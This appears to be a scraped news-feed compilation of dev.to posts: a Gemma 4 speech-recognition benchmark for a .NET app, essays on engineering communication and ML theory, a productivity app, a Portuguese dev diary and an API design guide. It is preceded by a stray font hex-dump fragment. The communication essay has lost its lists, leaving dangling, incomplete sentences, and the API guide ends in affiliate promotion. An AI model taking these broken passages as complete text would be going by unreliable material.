..*..*.. EB9D: 62 ; .**...*. EB9E: 62 ; .**...*. EB9F: 00 ; ........ screen code $19 EBA0: 62 ; .**...*. EBA1: 62 ; .**...*. EBA2: 62 ; .**...*. EBA3: 34 ; ..**.*.. EBA4: 18 ; ...**... EBA5: 18 ; ...**... EBA6: 18 ; ...**... EBA7: 00 ; ........ screen code $1A EBA8: 7F ; .******* EBA9: 03 ; ......** EBAA: 06 ; .....**. EBAB: 08 ; ....*... EBAC: 10 ; ...*.... EBAD: 60 ; .**..... EBAE: 7F ; .******* EBAF: 00 ; ........ screen code $1B EBB0: 3C ; ..****.. EBB1: 30 ; ..**.... EBB2: 30 ; ..**.... EBB3: 30 ; ..**.... EBB4: 30 ; ..**.... EBB5: 30 ; ..**.... EBB6: 3C ; ..****.. EBB7: 00 ; ........ screen code $1C EBB8: 0E ; ....***. EBB9: 10 ; ...*.... EBBA: 30 ; ..**.... EBBB: FE ; *******. EBBC: 30 

---
## Shipping Gemma 4 speech recognition in a Windows .NET desktop app: a 5-variant model-selection tour

> Published: 2026-05-24 03:51:31+00:00
> Source: https://dev.to/mdemin729/shipping-gemma-4-speech-recognition-in-a-windows-net-desktop-app-a-5-variant-model-selection-tour-2l8i
> wpnews: https://wpnews.pro/news/shipping-gemma-4-speech-recognition-in-a-windows-net-desktop-app-a-5-variant

The article describes integrating Google's Gemma 4 speech recognition model into Parlotype, a privacy-focused Windows voice-to-text desktop app that runs entirely on-device. The author evaluated five available GGUF variants of Gemma 4 (E2B and E4B in BF16, Q4_K_M, and Q8_0 formats) against Whisper models on LibriSpeech test-other samples to determine the best combination of accuracy, speed, and disk footprint. The chosen runtime was llama-server due to its cross-vendor GPU support, no Python dependency, and stable HTTP API, with the final model selection and benchmark data published in the project's documentation.

*This is a submission for the Gemma 4 Challenge: Build with Gemma 4*

## What I Built

**Parlotype** is a voice-to-text desktop app for Windows. It is built with .NET 10 and Avalonia UI. You hold a global hotkey, speak, then release it. Your text appears in whatever app you were typing into. All speech recognition runs on your machine. No cloud, no audio leaves the machine.

Google released Gemma 4 in April 2026. It has a native multimodal audio path. I added it as an alternative speech engine alongside the existing Whisper.net pipeline. You pick Whisper or Gemma 4 in Settings. The rest of the audio pipeline (WASAPI capture, then Silero VAD, then text injection) stays the same.

The interesting part, and what this post is mostly about, is which Gemma 4 variant to ship. The `ggml-org`

GGUF repo publishes five variants (E2B and E4B, each in BF16, Q4_K_M, and Q8_0, except where the repo skips one). The model card does not tell you which combination of accuracy, speed, and disk footprint you will actually get. So I ran each one on the same dataset, picked a default, and shipped.

## Demo

The video shows the engine selector, the model picker with five variants, and a live dictation with Gemma 4.

## Code

Source, ADRs, and benchmark configs: [github.com/mdemin729/parlotype](https://github.com/mdemin729/parlotype)

Relevant entry points:

-
: the recognizer that talks to`src/Parlotype.Platform/Speech/LlamaCppSpeechRecognizer.cs`

`llama-server`

. -
: the 5-variant catalog.`src/Parlotype.Core/Speech/Gemma4ModelInfo.cs`

-
through`docs/decisions/025-gemma4-llamacpp-desktop.md`

: the ADR series covering the integration.`030-configurable-gemma4-prompts.md`

-
: the benchmark data behind the choices below.`results/comparison-libri-speech-test-other-2026-05-23-cuda.md`

## How I Used Gemma 4

### Why a separate engine at all

Whisper is great on clean read English. It gets noticeably worse on conversational or noisy audio. Gemma 4 has a conformer audio encoder. Google's own evaluations show it reaching 4.17% WER on LibriSpeech-test-clean, which is competitive with much larger Whisper variants. For a voice-to-text app, the typical user is dictating to themselves into a focused text field. That noise profile is closer to "clean read" than to "AMI meeting", so Gemma 4 is a real alternative. Giving people the choice felt right. Either way, privacy does not depend on which model is loaded.

### Why `llama-server`

as the runtime

I looked at several inference paths before picking `llama-server`

, the HTTP server from llama.cpp. The constraints were: no cloud, Windows desktop, single end-user installer, cross-vendor GPU support, no Python runtime in the user's install.

`onnxruntime-genai`

does not support Gemma 4's architecture yet (per-layer embeddings, variable head dimensions). Tracking issue: [microsoft/onnxruntime-genai#2062](https://github.com/microsoft/onnxruntime-genai/issues/2062). A Python sidecar works, but it pulls Python and CUDA into the user's install. That is a non-starter for non-developer users. LLamaSharp's P/Invoke bindings lock you to one llama.cpp build at compile time, so switching from Vulkan to CUDA means re-compiling. Ollama does not support Gemma audio yet ([ollama/ollama#15333](https://github.com/ollama/ollama/issues/15333)). Lemonade is AMD-only.

`llama-server`

with the pre-built Vulkan/CUDA Windows binaries hits all of these. Cross-vendor GPU support from one download. A stable OpenAI-compatible HTTP API at `/v1/chat/completions`

, with `input_audio`

blocks for audio. A release cadence I can manage from in-app updates. [ADR-025](https://github.com/mdemin729/parlotype/blob/gemma4-challenge/docs/decisions/025-gemma4-llamacpp-desktop.md) has the longer version of this decision.

### Picking a variant: the benchmark

The catalog has five variants. That is what `ggml-org/gemma-4-E2B-it-GGUF`

and `ggml-org/gemma-4-E4B-it-GGUF`

actually publish, not what I would ideally pick (see [ADR-029](https://github.com/mdemin729/parlotype/blob/gemma4-challenge/docs/decisions/029-gemma4-model-download-ui.md)):

| ModelId | GGUF | Size on disk (with bf16 mmproj) |
|---|---|---|
`gemma-4-E2B-it-Q8_0` |
E2B Q8_0 | ~5.5 GiB |
`gemma-4-E2B-it-bf16` |
E2B BF16 | ~9.6 GiB |
`gemma-4-E4B-it-Q4_K_M` |
E4B Q4_K_M | ~5.9 GiB |
`gemma-4-E4B-it-Q8_0` |
E4B Q8_0 | ~8.4 GiB |
`gemma-4-E4B-it-bf16` |
E4B BF16 | ~15 GiB |

E2B has no Q4_K_M. That asset does not exist in the repo. I learned this when manual testing returned a 404. After that, I rebuilt the catalog from the actual file lists on HuggingFace.

I ran each variant against Whisper (Small, Medium, LargeV3Turbo) on 50 samples of LibriSpeech `test-other`

, which is the "harder" English split. Same machine, same warm-up methodology, both engines on CUDA. Whisper used greedy decoding (beam=1) so the runs are reproducible.

| Rank | Engine | Model | WER % | CER % | RTF | Model load (s) |
|---|---|---|---|---|---|---|
| 1 | Whisper (CUDA) | `LargeV3Turbo` |
11.48 |
4.97 | 0.055 | 1.31 |
| 2 | Whisper (CUDA) | `Medium` |
12.18 | 5.41 | 0.073 | 1.28 |
| 3 | Whisper (CUDA) | `Small` |
13.10 | 5.87 | 0.034 |
0.71 |
| 4 | Gemma 4 (llama.cpp) | `E2B-it-BF16` |
13.15 | 4.95 |
0.038 | 6.70 |
| 5 | Gemma 4 (llama.cpp) | `E4B-it-Q4_K_M` |
13.82 | 5.80 | 0.038 | 6.73 |
| 6 | Gemma 4 (llama.cpp) | `E4B-it-BF16` |
14.20 | 5.40 | 0.038 | 6.72 |
| 7 | Gemma 4 (llama.cpp) | `E4B-it-Q8_0` |
14.39 | 5.79 | 0.044 | 9.25 |
| 8 | Gemma 4 (llama.cpp) | `E2B-it-Q8_0` |
19.22 | 8.95 | 0.315 | 6.74 |

Three things from the table:

-
(4.95%). It barely beats Whisper`E2B-it-BF16`

has the lowest CER of any model here`LargeV3Turbo`

(4.97%), but it still beats it. WER and CER do not always agree, and at this size class Gemma's character-level errors are unusually small. -
That is close to Whisper`E4B-it-Q4_K_M`

(the shipping default) is at 13.82% WER and 0.038 RTF.`Small`

(13.10% WER and 0.034 RTF) at about the same on-disk size. The Q4_K_M quant is the right floor for shipping. It gives people Gemma 4 without asking them to download 15 GiB. -
RTF 0.315, which is 8x slower than the other Gemma variants. WER 19.22%. The first benchmark attempt crashed`E2B-it-Q8_0`

is broken on this dataset.`llama-server`

mid-sample because the model emitted a stray`<|channel>`

reasoning token that the chat-template parser could not handle. I keep this variant selectable in the catalog for experimentation, but the user-facing default avoids it.

### What I picked, and why

The shipping default is ** gemma-4-E4B-it-Q4_K_M**. About 5.9 GiB on disk, 13.82% WER on this dataset, 0.038 RTF. E2B-BF16 is technically more accurate, but it takes 9.6 GiB. That is not worth it for a tiny WER edge. E4B Q8 and BF16 are there for people who want maximum accuracy and have the disk space. E2B-Q8 stays in the catalog with a "known issue" tag.

The model picker shows all five so people can experiment. But the default is the one I would install on a friend's machine without thinking about it.

## Architecture

Gemma 4 sits behind the same `ISpeechRecognizer`

interface as Whisper. A `DelegatingSpeechRecognizer`

(backed by a small `SpeechRecognizerFactory`

) picks one or the other at init time, based on the user's engine setting. The `LlamaCppSpeechRecognizer`

owns a child `llama-server.exe`

process. It posts audio as a base64 WAV blob to `/v1/chat/completions`

:

``` js
// Excerpt from LlamaCppSpeechRecognizer.cs
var body = new
{
    messages = new[]
    {
        new
        {
            role = "user",
            content = new object[]
            {
                new { type = "text", text = promptText },
                new { type = "input_audio", input_audio = new { data = base64, format = "wav" } }
            }
        }
    },
    stream = false
};
using var response = await _httpClient.PostAsJsonAsync(
    "/v1/chat/completions", body, cancellationToken);
```

Same capture, same VAD, different recognizer:

The `llama-server`

binary itself is also managed by the app. [ADR-026](https://github.com/mdemin729/parlotype/blob/gemma4-challenge/docs/decisions/026-managed-llama-server-install.md) covers the catalog/installer/registry subsystem that downloads Vulkan or CUDA builds from llama.cpp's GitHub Releases on demand. Users do not pick paths in a folder browser. They pick a backend in a list and hit Install. That subsystem is about 1,800 lines on its own and probably deserves its own post.

The transcription prompt is also user-editable. [ADR-030](https://github.com/mdemin729/parlotype/blob/gemma4-challenge/docs/decisions/030-configurable-gemma4-prompts.md) turned the hardcoded prompt into a small registry with a built-in default and a `{language}`

placeholder. The placeholder is there for a future feature that picks the source language from the active keyboard layout.

## What this taught me

Three things I learned from doing this:

-
**The model card's headline numbers do not transfer to your stack.** Google's reported 4.17% WER on LibriSpeech-clean is real. But the path from "the model can do 4.17%" to "my app does 13.82% on noisy audio with the quantization that fits on user disks" goes through five variant choices, a runtime choice, and the measurement methodology. Benchmark on your own stack. -
**Most of the work is in the catalog, not in the inference call.** The actual`/v1/chat/completions`

HTTP call is about 30 lines of code. The variant catalog, the download manager, the side-by-side install of llama-server backends, the prompt registry. That is where most of the engineering went. -
**Asymmetric quantization coverage is the rule, not the exception.** E2B has no Q4_K_M in the published GGUFs. The catalog has to reflect what is actually on HuggingFace, not what would be theoretically nicest.

## Try Parlotype

- Repo:
[github.com/mdemin729/parlotype](https://github.com/mdemin729/parlotype) - Windows only for now. .NET 10, MIT licensed.
- Pick Gemma 4 in Settings -> Speech Engine. The in-app installer downloads
`llama-server`

and the GGUF for you.

*Maksim Demin is a .NET engineer building Parlotype, a voice-to-text desktop app. He writes about cross-platform .NET, Avalonia, and local AI.*

---
## Engineers Don’t Fail Technical Interviews Because They’re Bad at Tech — They Fail Because They Ignore Communication

> Published: 2026-05-24 03:50:46+00:00
> Source: https://dev.to/sarim_nadeem_888180307df8/engineers-dont-fail-technical-interviews-because-theyre-bad-at-tech-they-fail-because-they-3hj1
> wpnews: https://wpnews.pro/news/engineers-dont-fail-technical-interviews-because-theyre-bad-at-tech-they-fail

The article argues that engineers often fail technical interviews and face career stagnation not due to a lack of technical skill, but because they neglect communication and soft skills. It emphasizes that engineering is fundamentally about reducing ambiguity between humans, and that poor communication—such as failing to ask clarifying questions or becoming emotionally attached to code—leads to costly mistakes and toxic work environments. The author concludes that companies hire problem-solvers who can connect technology to business needs, not just code generators.

The biggest engineering disasters are rarely caused by syntax errors. They are caused by misunderstandings, ego clashes, assumptions, silence, and poor communication.
A lot of junior engineers believe that becoming “technically strong” is enough.
So they:
And then...
They enter a technical interview.
Or a sprint planning meeting.
Or a production incident call.
Or a design review.
And suddenly:
The painful reality?
Engineering is not just about writing code. Engineering is about reducing ambiguity between humans.
And the engineers who ignore communication and soft skills eventually hit a wall.
There is a dangerous belief floating around in engineering culture:
“If you are technically good enough, everything else will automatically work out.”
It does not.
Some of the smartest engineers fail interviews, lose promotions, damage team trust, and create toxic work environments because they never learned how to:
A company is not hiring a code generator.
A company is hiring someone who can:
That changes everything.
Many junior engineers stay silent in meetings because they think:
“If I ask questions, people will think I am inexperienced.”
In reality?
Senior engineers usually respect thoughtful questions.
What actually hurts you is:
A wrong implementation caused by unclear communication is far more expensive than asking a “simple” question.
NASA’s Mars Climate Orbiter mission failed because one engineering team used imperial units while another used metric units.
The result?
A $125 million spacecraft was lost because of communication and coordination failures.
Not because engineers couldn’t code.
One of the fastest ways to stagnate as an engineer is becoming emotionally attached to your code.
A pull request review is not a war.
Yet many engineers react like this:
Strong engineers separate:
Your code being improved does not mean you are weak.
The engineers who grow the fastest are usually the ones who:
This mistake destroys technical interviews.
The interviewer asks:
“Why would you choose Redis here?”
And the candidate starts explaining:
But they never answer:
“What business problem does Redis solve in THIS scenario?”
Great engineers connect technology to:
Technology is a tool.
Problem solving is the actual job.
Once engineers gain a little experience, a new problem appears.
Ego.
Not always loud ego.
Sometimes subtle ego.
The kind that appears as:
Many engineers unknowingly optimize for appearing intelligent instead of being useful.
That leads to:
The best engineers often explain extremely complex systems using simple language.
Because clarity is a sign of mastery.
Not complexity.
People assume senior engineers have mastered communication.
That is not always true.
Some senior engineers become technically excellent but emotionally difficult to work with.
And that becomes a massive organizational bottleneck.
If junior engineers are afraid to:
then the team becomes slower and more fragile.
The best senior engineers create environments where:
A fearful team hides problems.
A healthy team surfaces problems early.
Technical disagreements are normal.
But immature engineers turn disagreements into:
Strong engineering culture focuses on:
Not personal victories.
One of the most revealing interview questions is:
“Tell me about a time you had a significant technical disagreement with a colleague.”
This question is not testing whether you were “right.”
It tests:
Many candidates accidentally fail this question.
Here is how weak candidates usually answer:
“My teammate wanted to use X technology, but I knew Y was better. I convinced everyone, and we used my solution.”
This answer silently communicates:
A mature response sounds more like this:
“We had different opinions regarding the architecture because we were optimizing for different constraints. Instead of debating emotionally, we listed the trade-offs, validated assumptions with data, and aligned on the approach that best matched the business priorities.”
Notice the difference.
The focus shifts from:
to:
That is what companies look for.
Anyone can appear confident when systems are stable.
Pressure reveals communication quality.
During outages and production incidents:
bad communication creates chaos.
Common failures include:
Strong engineers during incidents:
One of the most valuable engineering skills is the ability to explain complex technical ideas to:
If your explanation only makes sense to experts, then communication has failed.
A strong engineer can:
Most engineers are never taught how meetings actually work.
So meetings become:
Common mistakes:
Speaking more does not make you appear smarter.
Clear, structured communication does.
Many engineers listen only to respond.
Strong communicators listen to:
Ambiguity kills projects.
Good engineers clarify:
The highest-paid engineers are often not the people writing the most code.
They are the people who can:
Because organizations scale through communication.
Not just code.
One of the most tragic examples of communication failure in engineering history was the Space Shuttle Challenger disaster.
Engineers had concerns regarding the O-ring performance in cold temperatures.
But:
contributed to catastrophic decision-making.
The issue was not purely technical.
It was also communicational and organizational.
Engineering failures are often human failures first.
Instead of trying to sound intelligent, they optimize for clarity.
Good documentation is scalable communication.
Pretending to know everything destroys trust.
Professional maturity matters.
Engineering rarely has perfect solutions.
Only trade-offs.
Try explaining:
to non-technical people.
That forces clarity.
Writing improves thinking.
This is one reason strong engineers often:
Clear writing exposes unclear thinking.
Disagreement is normal.
Emotional escalation is optional.
Watch how experienced engineers:
This single habit improves:
The engineering world glorifies:
But many careers quietly collapse because engineers never learned how to:
The uncomfortable truth?
A technically average engineer with strong communication skills will often outperform a technically brilliant engineer who cannot work effectively with people.
Because modern engineering is a team sport.
Not a solo coding competition.
And the engineers who truly stand out are usually the ones who can:
That is what real engineering looks like.
#softwareengineering
#career
#communication
#productivity
#leadership
#programming
#webdev
#beginners

---
## The 20% of ML theory that earns its keep in production

> Published: 2026-05-24 03:48:25+00:00
> Source: https://dev.to/thousand_miles_ai/the-20-of-ml-theory-that-earns-its-keep-in-production-184g
> wpnews: https://wpnews.pro/news/the-20-of-ml-theory-that-earns-its-keep-in-production

According to a recent discussion on r/learnmachinelearning, approximately 20% of machine learning theory is responsible for handling 80% of production work. The article identifies four key theoretical concepts—bias-variance tradeoff, regularization, loss function design, and probability calibration—as the most impactful for real-world deployment, while emphasizing that practical skills like data pipelines, observability, and system engineering ultimately determine whether the theory can be effectively applied.

A community thread on r/learnmachinelearning landed on a sharp claim this week: 20% of ML theory handles 80% of production work. The post — written by a data scientist six months into an engineering role — named the algorithms (logistic regression, gradient-boosted trees, transformers) and the shipping skills (Docker, SQL, data validation). It left the theory itself implicit. The four classical concepts below are what production reliably tests for, and what reliably falls away.
Bias-variance is taught as a U-curve and a training-set anecdote. In production it shows up earlier — as the forecast for whether a model will quietly degrade between offline metrics and live traffic. High-variance fits look brilliant on a held-out set and embarrass themselves on the long tail; high-bias fits look mediocre offline and stay mediocre live. The reason the framework earns its keep is that it answers the question every team asks in week three — "training looked fine, deployment didn't, why" — without inventing new vocabulary for the diagnosis.
The textbook frames regularization as a way to discourage large weights. The production frame is cheaper: regularization is the lever for "how much data does this model have, really, after the duplicates and the leakage are gone." Strong L2, larger dropout, smaller learning rates are the same answer to the same problem — the effective dataset is smaller than the row count suggests. Tuning regularization without first auditing data quality is how teams burn a week chasing a number that data cleaning would have moved more.
Most teams pick a loss function the way they pick a base image — once, by default, and never again. The classical concept that earns its keep is the inverse: the loss function is a product spec, written in math, that the optimizer takes literally. A fraud model shipped with vanilla cross-entropy is telling the optimizer that catching one extra true positive is worth nine extra false positives, and then everyone is surprised when human reviewers drown in alerts. Naming the asymmetry — class weights, focal loss, an explicit cost matrix — is the smallest theoretical move with the largest downstream effect.
The metric on the dashboard is accuracy or AUC. The metric the downstream system actually consumes is a probability — a 0.84 score that some other service multiplies by an expected-value estimate, or that a threshold rule converts into an action. Models can score well on AUC and still be wildly miscalibrated, returning 0.9 confidence on events that resolve true 60% of the time. A reliability diagram or a quick Platt-scaling pass takes an afternoon and forecloses the most common production failure mode for any model whose score is going to be multiplied by something later.
The four concepts above are theory. The Reddit thread is right that the day is mostly not theory — it is data pipelines, observability, on-call rotations, and the long discipline of evals that survive a model swap. Those skills decide whether the theory ever gets a chance to matter. For that systems half of the job, the original thread is the better read, and the comments below it — where practitioners argue about the algorithm list — are worth more than the post itself.
Source: 6 Months of ML Engineering: The 20% of theory that handles 80% of production code.

---
## WeiQi - (Go) game based productivity tool

> Published: 2026-05-24 03:43:27+00:00
> Source: https://dev.to/ssithub/weiqi-go-game-based-productivity-tool-35d8
> wpnews: https://wpnews.pro/news/weiqi-go-game-based-productivity-tool

The article describes a productivity tool called WeiQi, inspired by the ancient strategy game Go (Weiqi), which transforms daily scheduling into a strategic game. It visualizes a user's day as a grid of 24 hours divided into 5-minute intervals, where tasks are dragged as "White Stones" and become "Black Stones" after 5 minutes of uninterrupted focus, visually representing conquered time. The tool also includes a macro heatmap view that aggregates daily focus data into a monthly grid, helping users identify peak productivity and distraction patterns.

Modern to-do lists are often endless, anxiety-inducing scroll-fests. They treat productivity as a sheer volume of output, leading to burnout. We wanted to fundamentally change how people perceive their daily schedule by treating time not as a list to conquer, but as a board to master.
Having always been fascinated by games in general, and ancient games in particular, we found the inspiration in the ancient strategy game of Weiqi (Go).
In Weiqi, the board is finite, players place stones with deep intention, and the goal is to gracefully claim territory.
We realized that timeboxing is simply the modern equivalent of this.
Your day is the board 🏁, your tasks 📋 are your stones ⚫⚪, and deep, uninterrupted focus ⏱️ is how you capture your territory 🚀
We wanted to build an app that brings the tactile, satisfying, and intentional strategy of Weiqi to everyday productivity.
WeiQi is a highly tactile, gamified timeboxing dashboard that turns your daily schedule into a strategic game of focus.
Your day is visualized as a beautiful wooden grid of 24 hours (rows) and 5-minute intervals (columns).
You drag unstructured tasks from your Inbox onto the board. Upon dropping them, they morph into connected "White Stones," visually reserving that territory for future work.
When real-world time catches up to a scheduled task, the app's analog clock smoothly morphs into a Pomodoro timer.
White stones represent potential/ pending tasks—they denote scheduled tasks, planned breaks, or incomplete work. Solid Black stones represent conquered territory—deep, uninterrupted focus.
As you work, every 5 minutes of unbroken focus triggers a satisfying 3D animation, physically flipping a White Stone ⚪ to a solid Black Stone ⚫. You don't just check a box; you visually conquer your timeline.
If you stop a timer before the 5 minutes are up, the stone simply remains White. A timeline scattered with White stones visually represents a fragmented day lacking deep focus, making invisible distractions painfully visible.
The Macro Heatmap with Monthly cum Weekly View auto-aggregates your daily Black Stones, generating a beautiful, zoomed-out Weiqi board that serves as a heat-map of your peak productivity 👩💻hours.
It also aggregates white stones denoting your peak distracted 😥 hours.
We built the project up in phases step-by-step using multiturn chats.
In phase 1, we built Foundation and The Game Board Layout with ToDo list inbox, Game Board with other elements added like wooden clock, pomodoro timer, dashboard
In phase 2, we implemented the Drag & Drop "Playing the Stones" mechanics for the Daily Board where tasks from to-do lists transform into tactile "White Stones" on the grid.
In Phase 3, we implemented the logic of The Timer and Capturing "Black Stones"
In Phase 4, we built up The Big Picture (The Macro Weiqi Game) which introduces a toggle switch to transition from the daily planner to a zoomed-out, auto monthly grid (Days vs. Hours). This read-only board automatically translates the focused time (Black Stones) earned in the Daily View into a visual heatmap, allowing users to see their macro productivity trends at a glance.
The most impressive feature MeDo helped create was the automated monthly board.
This was the game changer. It helped me create beautiful UI elements by taking inspos.

---
## Diário de dev #1: o que 15 minutos desbloqueou

> Published: 2026-05-24 03:41:54+00:00
> Source: https://dev.to/trainedloop/diario-de-dev-1-o-que-15-minutos-desbloqueou-1a38
> wpnews: https://wpnews.pro/news/diario-de-dev-1-o-que-15-minutos-desbloqueou

The article describes a software developer's week, highlighting how AI has lowered the barrier for creating user interfaces but not for deploying them, as a marketing colleague built a good page with AI but couldn't publish it without developer help. It also discusses the frustration of silent bugs that lack error messages, the complementary roles of automated tests and manual QA, and ongoing infrastructure work. Finally, the author explores voice synthesis for a game engine, finding that offline options like Kokoro sound robotic in Brazilian Portuguese while online services like ElevenLabs offer better quality but incur per-character costs.

Segunda semana do diário. Se a anterior foi sobre um mês inteiro de construir e jogar fora, essa foi mais mundana. Infra que ninguém vê, um projeto pequeno que virou ferramenta pra outra pessoa, e uma noite explorando um problema que ainda não tem resposta.
Alguém do time de marketing me mostrou uma página de evento que tinha construído com IA. Ficou boa. Sério, boa mesmo: cores certas, espaçamento certo, seguindo o design system. Aí veio a pergunta: "como eu coloco isso no ar?"
Esse gap me pegou de surpresa. O trabalho difícil estava feito. A parte que eu esperaria ser o obstáculo, criar a interface, tinha sido resolvida por alguém sem experiência técnica usando IA. O que travou foi publicar. Um detalhe de infraestrutura que pra qualquer dev é trivial, mas que pra quem nunca mexeu com git ou servidores é uma parede.
Montei um repo no GitHub Pages onde cada pasta vira automaticamente uma URL em nosso domínio. Faz upload, aparece em dominio.com/nome-do-evento. Quinze minutos de configuração.
O que me ficou foi pensar em quantas outras pessoas estão nessa situação agora. IA abaixou muito o piso pra criar interfaces, mas a infraestrutura ainda pressupõe conhecimento que a maioria das pessoas não tem e provavelmente não quer ter. O trabalho de dev vai mudando, mas não necessariamente diminuindo. Às vezes vira isso: resolver a última milha pra quem chegou até lá sozinho.
No trabalho foi uma semana de trabalho que ninguém vai mostrar numa apresentação. Infraestrutura, permissões, estado inconsistente.
Tem uma categoria de bug que eu acho particularmente frustrante: o que não grita. Sem exception, sem mensagem de erro, sem log óbvio. Só um usuário preso num fluxo de login que não avançava e não explicava por quê. Quando você finalmente entende o que estava acontecendo, a solução cabe em três linhas. O difícil foi chegar até lá.
Além disso, rodou um ciclo de QA mais pesado numa tela complexa do produto, aquele tipo de tela onde o estado vem de vários lugares ao mesmo tempo e as fontes se interferem de formas que só aparecem quando você junta tudo. Tínhamos testes. Não eram suficientes.
Não é que os testes fossem ruins. É que teste automatizado tende a verificar o que você imaginou que poderia dar errado. QA externo encontra o que você não imaginou. São dois tipos de cobertura diferentes, e essa semana ficou claro de novo que um não substitui o outro.
O resto foi infra. Esse tipo de trabalho tem um ritmo próprio: você acha que vai ser rápido, descobre que não é, ajusta, testa de novo. Cloud costuma ter pelo menos uma surpresa guardada em algum canto de permissão que você não esperava precisar configurar.
RPGTeller é um engine de livros-jogos que estou construindo. Essa semana queria explorar narração por voz, dar vozes distintas pra cada personagem.
Comecei pelo Kokoro, uma opção de síntese de voz que roda offline. Tem apelo óbvio pra um projeto assim: sem dependência de API, sem custo por caractere, roda localmente. O problema é que dublagem em português brasileiro ficou robótica demais. Funcional, mas longe de imersiva.
Migrei pro ElevenLabs. Ficou melhor, suficiente pra eu conseguir atribuir vozes específicas por personagem: uma voz de narrador, outra pra Svetlana, outra pro guerreiro. Dá pra imaginar como vai soar no jogo.
Mas ElevenLabs é uma API paga por caractere. Antes de seguir por esse caminho, quero saber se consigo qualidade aceitável rodando algo local. Ainda não sei a resposta.
Não terminei essa exploração. Ainda quero testar mais opções, especialmente coisas que rodam localmente e têm qualidade aceitável em pt-BR. Por enquanto ficou Kokoro ruim, ElevenLabs bom mas online.
O diário #0 cobriu um mês. Esse cobriu uma semana normal. Se quiser acompanhar os próximos, segue lá.

---
## The Complete Guide to API Design in 2026: REST, GraphQL, and tRPC in Production

> Published: 2026-05-24 03:38:19+00:00
> Source: https://dev.to/zny10289/the-complete-guide-to-api-design-in-2026-rest-graphql-and-trpc-in-production-4ib2
> wpnews: https://wpnews.pro/news/the-complete-guide-to-api-design-in-2026-rest-graphql-and-trpc-in-production

The article summarizes the 2026 API design landscape, identifying three dominant patterns: REST for public APIs and microservices, GraphQL for complex data requirements, and tRPC for TypeScript-to-TypeScript full-stack applications. It emphasizes that teams should choose based on fit rather than hype, and provides specific guidance on when to use each technology, including best practices for error handling, versioning, and rate limiting. The article also includes a decision flowchart to help teams select the appropriate API approach based on their environment and needs.

# The Complete Guide to API Design in 2026: REST, GraphQL, and tRPC in Production

The API design landscape in 2026 settled into three clear patterns. REST for public APIs and microservices. GraphQL for complex data requirements. tRPC for TypeScript-to-TypeScript full-stack applications.

Each has a legitimate use case. The mistakes happen when teams choose based on hype rather than fit.

## REST in 2026: Still the Default for a Reason

REST APIs remain the dominant pattern for:

- Public and partner APIs (ease of documentation and tooling)
- Microservices that need simple, well-defined contracts
- Teams without TypeScript full-stack expertise

The key REST improvements in 2026:

### Better Error Responses

```
{
  "error": {
    "code": "VALIDATION_ERROR",
    "message": "Request validation failed",
    "details": [
      {
        "field": "email",
        "code": "INVALID_FORMAT",
        "message": "Must be a valid email address"
      }
    ],
    "requestId": "req_a1b2c3d4e5"
  }
}
```

The `requestId`

addition transformed our debugging. Every error now links to structured logs.

### API Versioning

Still the most contentious topic. Our 2026 recommendation: URL versioning for major breaking changes only.

```
GET /v1/users     ← Major version, breaking changes
GET /users?since= ← Minor additions, no versioning
```

### Rate Limiting Headers

Standardized rate limit headers finally emerged as a convention:

```
X-RateLimit-Limit: 1000
X-RateLimit-Remaining: 999
X-RateLimit-Reset: 1716560400
Retry-After: 3600
```

## GraphQL: When It's Actually the Right Choice

GraphQL shines when:

**Complex, nested data requirements**: A dashboard that pulls users, their orders, the products in those orders, and supplier data for those products. With REST, this requires 4+ requests or a massively overfetching endpoint.**Multiple client types**: Mobile (needs different data than desktop) and web clients with different requirements. GraphQL's flexible queries handle this cleanly.**Rapid client evolution**: When your mobile and web teams work independently, GraphQL's schema contract reduces coordination overhead.

### When GraphQL Is Wrong

-
**Simple CRUD**: If you're mostly doing Create, Read, Update, Delete on single resources, REST is simpler and has better tooling for this pattern. -
**File uploads**: Still awkward in GraphQL. Use REST for this. -
**Caching**: REST with HTTP caching is simpler and more efficient for publicly cacheable data.

### The Schema Design Discipline

GraphQL's superpower is the type system. But it requires discipline:

```
type User {
  id: ID!
  email: String!
  createdAt: DateTime!

  # Explicitly define what's included, avoid N+1
  orders(first: Int, after: String): OrderConnection!
  totalOrderCount: Int! # Pre-computed, not derived
}

type OrderConnection {
  edges: [OrderEdge!]!
  pageInfo: PageInfo!
  totalCount: Int!
}
```

The `totalCount`

as a separate field (pre-computed) prevents COUNT(*) queries on every request.

## tRPC: The TypeScript Revolution

tRPC became the default for TypeScript monorepos in 2025-2026. The appeal is real: end-to-end type safety without code generation.

``` js
// Server: define the procedure
const userRouter = router({
  getById: publicProcedure
    .input(z.object({ id: z.string() }))
    .query(async ({ input }) => {
      return db.user.findUnique({ where: { id: input.id } });
    }),
});

// Client: fully typed, no code generation
const user = await trpc.user.getById.query({ id: userId });
// user is typed based on the server definition
```

The productivity gains are real for teams already in TypeScript. The tradeoff: you need a TypeScript monorepo, and the learning curve for Zod schemas is real.

### When to Choose tRPC

✅ **Perfect for**: Full-stack TypeScript teams, rapid development, internal tools, startups moving fast

❌ **Not for**: Multi-language environments, public APIs, teams without TypeScript expertise

## The Decision Framework

```
Is your team TypeScript-first with a monorepo?
  → YES → tRPC for internal services, REST for public APIs
  → NO  → Continue below

Do clients need different data shapes for the same endpoint?
  → YES → GraphQL
  → NO  → Continue below

Is this a public/partner API?
  → YES → REST (better tooling, easier to document, broader client support)
  → NO  → REST is probably fine, GraphQL if the data model is complex
```

## The Tooling That Matters in 2026

For REST:

-
**Zod** for input validation (replaced Joi and class-validator) -
**Hono** or**Fastify** for the framework (Express is showing its age) -
**scalar** or**redocly** for API documentation

For GraphQL:

-
**GraphQL Yoga 5**(replaced Apollo Server as the default) -
**pothos** or**nexus** for schema-first development -
**Studio** for Explorer and monitoring

For tRPC:

-
**tanstack-query** as the client (works with tRPC natively) -
**Zod** for input validation -
**Kysely** for type-safe database queries

*This article contains affiliate links. If you sign up through the links above, I may earn a commission at no additional cost to you.*

## Ready to Build Your Online Business?

** Get started with Systeme.io for free** — All-in-one platform for building your online business with AI tools.

---
## 🐍 Flask Python Structured Logging — What Most Miss in Production

> Published: 2026-05-24 03:37:27+00:00
> Source: https://dev.to/ptp2308/flask-python-structured-logging-what-most-miss-in-production-45g6
> wpnews: https://wpnews.pro/news/flask-python-structured-logging-what-most-miss-in-production

The article explains that approximately 80% of Flask applications still use basic `print()` statements or unstructured logging in production, which hinders effective debugging and monitoring despite the availability of modern tools like Datadog and Elasticsearch. It demonstrates how to implement structured JSON logging using Python's built-in `logging` module with a custom `JsonFormatter`, and also highlights the simpler alternative of using the Loguru library, which offers cleaner syntax and native support for structured output through features like contextual binding with `bind()`.

